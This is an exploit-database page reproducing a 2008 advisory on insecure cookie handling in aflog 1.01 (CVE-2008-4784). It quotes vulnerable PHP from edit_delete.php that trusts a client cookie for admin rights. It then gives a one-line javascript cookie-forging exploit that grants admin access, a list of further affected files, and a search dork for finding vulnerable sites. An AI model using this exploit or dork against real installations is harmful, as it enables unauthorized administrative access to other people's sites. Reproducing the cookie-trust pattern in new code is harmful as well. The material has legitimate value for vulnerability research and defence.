Lucene search
+L

aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities

🗓️ 23 Oct 2008 00:00:00Reported by JosSType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Insecure cookie handling vulnerabilities in aflog 1.01 allow unauthorized access risks.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4784
23 Oct 200800:00
circl
cve
CVE
CVE-2008-4784
29 Oct 200814:00
cve
cvelist
Cvelist
CVE-2008-4784
29 Oct 200814:00
cvelist
euvd
EUVD
EUVD-2008-4764
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-4784
29 Oct 200814:22
nvd
openvas
OpenVAS
aflog Cookie-Based Authentication Bypass Vulnerability
11 Nov 200800:00
openvas
prion
Prion
Authentication flaw
29 Oct 200814:22
prion
# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies
# url: http://www.aflog.org/download.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /edit_delete.php
vuln code:
15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){
xx: .. ---> :P
33: }
34: } else {
35:  echo "<center><b><img src='img/x.png'>&nbsp;ERROR!</b><br>You do not have access to this page. You must be Signed In as
36: an Admin.</center><br>";
37:  echo "<center><a href='index.php' class='c'>Home</a> | <a href='login.php?do=form' class='c'>Sign In</a></center>":
38: }

exploit:    javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/";
and enters: /edit_delete.php?id=1 --> POST ID!!
---
vuln files:
edit_cat.php
edit_lock.php
edit_form.php
...more?

dork: "powered by aflog"

Hack0wn :D

# milw0rm.com [2008-10-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02773
33